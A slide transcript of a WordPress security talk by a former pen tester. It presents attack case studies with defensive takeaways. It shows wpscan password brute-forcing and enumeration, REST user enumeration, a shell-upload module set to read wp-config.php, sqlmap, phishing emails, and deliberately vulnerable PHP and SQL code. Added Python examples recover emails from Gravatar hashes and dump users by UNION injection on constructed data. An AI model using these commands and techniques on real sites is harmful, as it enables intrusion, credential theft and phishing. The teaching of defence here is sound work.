Slide 1

Slide 1 text

TIM NASH @tnash Come to the dark side They have cookies...

Slide 2

Slide 2 text

What's the worst that can happen?

Slide 3

Slide 3 text

No content

Slide 4

Slide 4 text

No content

Slide 5

Slide 5 text

No content

Slide 6

Slide 6 text

Client email Hi, we are going to be on the One Show in about two hours. Do you need to do anything?

Slide 7

Slide 7 text

ruby wpscan.rb --url

Slide 8

Slide 8 text

Intelligence gathering is fun!

Slide 9

Slide 9 text

No content

Slide 10

Slide 10 text

function df_save_options() {
    $fields = $_REQUEST;                  // every GET, POST and cookie value, unfiltered
    foreach ($fields as $key => $field) {
        if ($key != "action") {
            echo $key . "-" . $field;     // reflected straight back to the caller
            update_option($key, $field);  // any option name, any value: no nonce, no capability check, no allowlist
        }
    }
    die();
}

Totally legit...

Slide 11

Slide 11 text

No content

Slide 12

Slide 12 text

No content

Slide 13

Slide 13 text

WordPress Platform Lead at 34SP.com
Former pen tester
Co-runs WordPress Leeds
Ran a small dev agency
Speaks about security around the country

Slide 14

Slide 14 text

Takeaways from the TV wonder
Use a child theme
Audit code regularly
Have control of your WAF
Get a disaster plan in place

Slide 15

Slide 15 text

Magazine Hack

Slide 16

Slide 16 text

Small print firm moved online
Mom and Pop shop
Uses a single WordPress site
Shared hosting
No in-house "dev" team

Slide 17

Slide 17 text

ruby wpscan.rb --url magazine-company.com --wordlist timspassword.dict --username admin

Slide 18

Slide 18 text

ruby wpscan.rb --url magazine-company.com --enumerate p

Slide 19

Slide 19 text

[+] Name: jetpack - v6.3.2
 | Latest version: 6.3.2 (up to date)
 | Last updated: 2018-07-04T10:01:00.000Z
 | Location: https://magazine.com/wp-content/plugins/jetpack/
 | Readme: https://magazine.com/wp-content/plugins/jetpack/readme.txt
 | Changelog: https://magazine.com/wp-content/plugins/jetpack/changelog.txt

Slide 20

Slide 20 text

[+] Name: jetpack - v6.3.2
 | Latest version: 6.3.2 (up to date)
 | Last updated: 2018-07-04T10:01:00.000Z
 | Location: https://magazine.com/wp-content/plugins/jetpack/
 | Readme: https://magazine.com/wp-content/plugins/jetpack/readme.txt
 | Changelog: https://magazine.com/wp-content/plugins/jetpack/changelog.txt

Slide 21

Slide 21 text

No content

Slide 22

Slide 22 text

/wp-json/wp/v2/users   (the REST users route: lists user ids, slugs and avatar URLs without logging in)

Slide 23

Slide 23 text

No content

Slide 24

Slide 24 text

6eefb55db48f21dde991e2694dda58fd
 == md5("[email protected]") ???
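The hash on this slide is the kind of value the REST users route hands out inside every user's avatar_urls: the Gravatar identifier, which is simply MD5 of the trimmed, lower-cased e-mail address. The following is an added example, not code from the talk, that pulls those hashes out of a users response and tries cheap guesses against them. The JSON record, the address and the domain list are constructed for the example; the hash inside the record is derived from that constructed address so the two stay consistent.

```python
import hashlib
import json
import re
from typing import Dict, Iterable, Optional

# Constructed sample record, shaped like one entry returned by the WordPress
# REST users route (/wp-json/wp/v2/users). The address is made up for this
# example and its Gravatar hash is computed here from it.
CONSTRUCTED_EMAIL = "Admin@Magazine-Company.com"
CONSTRUCTED_USERS_JSON = json.dumps([
    {
        "id": 1,
        "name": "Site Admin",
        "slug": "admin",
        "avatar_urls": {
            "96": "https://secure.gravatar.com/avatar/"
                  + hashlib.md5(CONSTRUCTED_EMAIL.strip().lower().encode("utf-8")).hexdigest()
                  + "?s=96&d=mm&r=g",
        },
    }
])

AVATAR_HASH_RE = re.compile(r"/avatar/([0-9a-f]{32})")


def gravatar_hash(email: str) -> str:
    """Gravatar's published scheme: MD5 of the trimmed, lower-cased address."""
    return hashlib.md5(email.strip().lower().encode("utf-8")).hexdigest()


def extract_hashes(users_json: str) -> Dict[str, str]:
    """Map user slug -> Gravatar hash for every user in a REST users response."""
    found: Dict[str, str] = {}
    for user in json.loads(users_json):
        for url in user.get("avatar_urls", {}).values():
            m = AVATAR_HASH_RE.search(url)
            if m:
                found[user["slug"]] = m.group(1)
                break
    return found


def candidate_emails(slug: str, domains: Iterable[str]) -> Iterable[str]:
    """Cheap guesses an attacker tries first: the login slug at each domain,
    plus a few role mailboxes. Assumed list, not from the talk."""
    local_parts = [slug, "admin", "info", "webmaster", "contact"]
    for domain in domains:
        for local in local_parts:
            yield f"{local}@{domain}"


def recover_email(target_hash: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose Gravatar hash matches, else None."""
    for email in candidates:
        if gravatar_hash(email) == target_hash:
            return email
    return None


if __name__ == "__main__":
    for slug, h in extract_hashes(CONSTRUCTED_USERS_JSON).items():
        hit = recover_email(h, candidate_emails(slug, ["magazine-company.com"]))
        print(f"{slug}: {h} -> {hit}")
```

The slug exposed by the route is usually the login name, so the guess list starts from it; once the hash confirms an address you have both halves of a credential-stuffing or spear-phishing target, which is where the next slides go.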

Slide 25

Slide 25 text

Typical WordPress update email

Slide 26

Slide 26 text

Please update your site at timstest.ismysite.co.uk to WordPress 4.9.7.

Updating with Jetpack installed is easy and only takes a few moments:
https://jetpack-wordpress.com/update/timstest.isymsite.co.uk

If you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.
https://wordpress.org/support/

Keeping your site updated is important for security. It also makes the internet a safer place for you and your readers.

The WordPress Team

Slide 27

Slide 27 text

Friendly, familiar login... Pre-populated username. What's missing?

Slide 28

Slide 28 text

The actual wp.com login

Slide 29

Slide 29 text

>> From: WordPress.com
>> Date: 21 September 2018 at 05:18:53 BST
>> To: [email protected]
>> Subject: wordpress database upgrade required !
>>
>> DataBase Upgrade Required
>>
>> Dear Customer,
>>
>> Your WordPress database is out-of-date, and must be upgrade before 29/09/2018.
>>
>> The upgrade process may take a while, so please be patient.
>>
>> Click here to Upgrade Wordpress
>>
>> Download our free mobile app today.
>> View stats, moderate comments, create and edit posts, and upload media.
>> Click here to learn more.
>> Automattic Inc. | 60 29th St. #343, San Francisco, CA 94110

Slide 30

Slide 30 text

Takeaways from our spear phishing attack
Never click untrusted links
Enable two-factor authentication
Limit administrator users
Don't use the same password on every site

Slide 31

Slide 31 text

No content

Slide 32

Slide 32 text

Charity Hack

Slide 33

Slide 33 text

Watford children's charity
Separate brochure site
SharePoint/Exchange server on site
IT manager
3rd-party developers for the site

Slide 34

Slide 34 text

No content

Slide 35

Slide 35 text

use exploit/shell/divi_revslider_shell_upload
set watfordcharity.com
set payload exec
set cmd cat wp-config.php

Slide 36

Slide 36 text

Slide 37

Slide 37 text

set cmd "ls wp-content/plugins"

Slide 38

Slide 38 text

What's the worst that can happen?

Slide 39

Slide 39 text

What's the worst that can happen?

Slide 40

Slide 40 text

No content

Slide 41

Slide 41 text

Takeaways from our slider attack
Always keep things up to date
Never rely on theme licences to get bundled plugins
The DB is not a safe place to store credentials

Slide 42

Slide 42 text

E-Commerce Site Hack

Slide 43

Slide 43 text

E-commerce site hack
WooCommerce-powered shop
100s of customers
Small dev team
Custom theme and a range of plugins

Slide 44

Slide 44 text

https://ecommerceexample.com/wp-content/themes/custom/dcss.php?id=1

Slide 45

Slide 45 text

python sqlmap.py -u "https://ecommerceexample.com/wp-content/themes/custom/dcss.php?id=1"

Slide 46

Slide 46 text

Slide 47

Slide 47 text

$id = $_GET['id'];  // taken straight from ?id=, no cast, no escaping, no prepare()
$result = $db->query("SELECT * FROM `{$tablename}` where `css_source`={$id}");  // $db: the theme's DB handle
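What sqlmap finds in a query built like this, as an added example that is neither the theme's code nor the talk's: the string-building lookup next to a parameterised one, run against an in-memory SQLite database constructed here with a theme_css table and a made-up wp_users row. Table names, columns and the password hash are assumptions for the example; SQLite accepts the same backtick-quoted identifiers as MySQL, so the vulnerable query is reproduced verbatim in shape.

```python
import sqlite3
from typing import Callable, List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's database (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE theme_css (css_source INTEGER, css TEXT)")
    conn.executemany(
        "INSERT INTO theme_css VALUES (?, ?)",
        [(1, "body{margin:0}"), (2, "h1{color:red}"), (3, "p{font-size:1em}")],
    )
    # The table an attacker actually wants; the hash value is made up.
    conn.execute("CREATE TABLE wp_users (user_login TEXT, user_pass TEXT)")
    conn.execute("INSERT INTO wp_users VALUES ('admin', '$P$BconstructedHashForTheExampleOnly')")
    conn.commit()
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, table: str, id_param: str) -> List[Tuple]:
    """Same shape as the theme's query: the request value is interpolated
    straight into the WHERE clause, unquoted and uncast."""
    sql = f"SELECT * FROM `{table}` WHERE `css_source`={id_param}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, id_param: str) -> List[Tuple]:
    """Hardened form: fixed table name (identifiers cannot be bound),
    integer cast on the input, and the value passed as a bound parameter."""
    try:
        css_id = int(id_param)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT * FROM theme_css WHERE css_source=?", (css_id,)).fetchall()


def boolean_probe(lookup: Callable[[str], List[Tuple]]) -> bool:
    """The first check sqlmap runs: if appending a true and a false condition
    to a valid id gives different responses, the parameter is injectable."""
    return lookup("1 AND 1=1") != lookup("1 AND 1=2")


if __name__ == "__main__":
    conn = make_db()
    vuln = lambda p: vulnerable_lookup(conn, "theme_css", p)
    print("normal:", vuln("1"))
    print("OR 1=1:", vuln("1 OR 1=1"))
    print("UNION :", vuln("1 UNION SELECT user_login, user_pass FROM wp_users"))
    print("injectable (vulnerable):", boolean_probe(vuln))
    print("injectable (safe):      ", boolean_probe(lambda p: safe_lookup(conn, p)))
```

The UNION payload works because the theme selects `*` from a two-column table, so any two-column SELECT can be glued on; with the WAF living inside the application (the next slide's point), the payload reaches the query before anything in WordPress gets to look at it.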

Slide 48

Slide 48 text

Slide 49

Slide 49 text

Takeaways from our SQL attack
Custom code is our responsibility
Never rely on a WAF that's in the application
Always check endpoints for SQL injection

Slide 50

Slide 50 text

Poisoning the well
Small blogger
Running WordPress for the first time
Gets support mainly from Facebook forums

Slide 51

Slide 51 text

Without trust we can't have security...

Slide 52

Slide 52 text

Takeaways from our poisoned well
If someone says there's an issue, DO NOT DISMISS IT
Help people to understand security
Security is everyone's responsibility

Slide 53

Slide 53 text

Security is your responsibility

Slide 54

Slide 54 text

A bad actor needs to be right once....

Slide 55

Slide 55 text

We need to be right all the time!

Slide 56

Slide 56 text

TIM NASH @tnash | timnash.co.uk/security Thank you very much!